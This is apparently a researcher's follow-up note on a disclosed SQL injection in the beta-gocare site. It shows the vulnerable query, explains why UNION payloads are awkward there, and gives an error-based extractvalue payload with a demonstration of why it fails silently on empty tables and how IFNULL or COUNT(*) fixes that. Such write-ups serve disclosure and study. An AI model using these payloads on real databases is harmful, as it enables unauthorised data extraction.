SQL Injection beta-gocare Success
This post is a follow-up to https://zeroday.hitcon.org/vulnerability/ZD-2025-01026
Original SQL statement (userInput marks where the untrusted search string is concatenated in)
SELECT * FROM (`product_file`) WHERE ( name like '% userInput %' OR content like '% userInput %' OR memo like '% userInput %' ) AND `display` = 'y' AND `sell_kind` > '0' AND `act_start` <= '2025-08-20' AND `act_end` >= '2025-08-20' LIMIT 12
Lessons learned
UNION SELECT is hard to pull off in practice here: the input lands inside the parenthesised LIKE group of a SELECT * query, so a UNION payload has to close the quote and the parenthesis, match the exact column count of product_file, and deal with the trailing AND ... LIMIT 12 clauses before the statement parses.
Error-based extraction with extractvalue(1,concat(0x7e,(SELECT name FROM members LIMIT 0,1))) has a trap: if members has no rows, the scalar subquery returns NULL, CONCAT(0x7e, NULL) is NULL, and EXTRACTVALUE(1, NULL) simply returns NULL instead of raising an XPATH syntax error, so the whole statement runs without an error and the probe looks like it failed. Wrap the value in IFNULL(..., 'x') or probe COUNT(*) first so the XPath argument is never NULL.
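The empty-table behaviour described above, as an added MySQL/MariaDB example that is not part of the original report. The members table, its columns and the row contents are constructed for the demonstration; it only shows why the extractvalue probe goes silent on an empty table and two ways to make it error reliably.

```sql
-- Added example, not from the original report or the target application.
-- Assumes MySQL/MariaDB; table, column and row values are constructed.
CREATE TABLE members (id INT PRIMARY KEY, name VARCHAR(64));

-- Empty table: the scalar subquery is NULL, CONCAT(0x7e, NULL) is NULL,
-- and EXTRACTVALUE(1, NULL) returns NULL. No XPATH error is raised, so
-- an error-based probe built this way reports nothing.
SELECT EXTRACTVALUE(1, CONCAT(0x7e, (SELECT name FROM members LIMIT 0,1))) AS r;

-- With at least one row the XPath argument becomes '~alice', which is not
-- valid XPath, and the server raises ERROR 1105 "XPATH syntax error: '~alice'",
-- leaking the value in the error text.
INSERT INTO members VALUES (1, 'alice');
SELECT EXTRACTVALUE(1, CONCAT(0x7e, (SELECT name FROM members LIMIT 0,1))) AS r;

-- Back to an empty table to show the two fixes.
DELETE FROM members;

-- Fix 1: IFNULL substitutes a marker string, so the XPath argument is never
-- NULL and the statement errors with '~empty' even when the table is empty.
SELECT EXTRACTVALUE(1, CONCAT(0x7e, IFNULL((SELECT name FROM members LIMIT 0,1), 'empty'))) AS r;

-- Fix 2: COUNT(*) always yields a non-NULL number, so probing it first
-- tells you whether there is anything to extract ('~0' here).
SELECT EXTRACTVALUE(1, CONCAT(0x7e, (SELECT COUNT(*) FROM members))) AS r;
```

In the page's query the probe would sit inside one of the LIKE literals, so the same NULL rule applies there: a silent response means either the injection did not execute or the subquery returned no row, and only the IFNULL or COUNT(*) variant distinguishes the two.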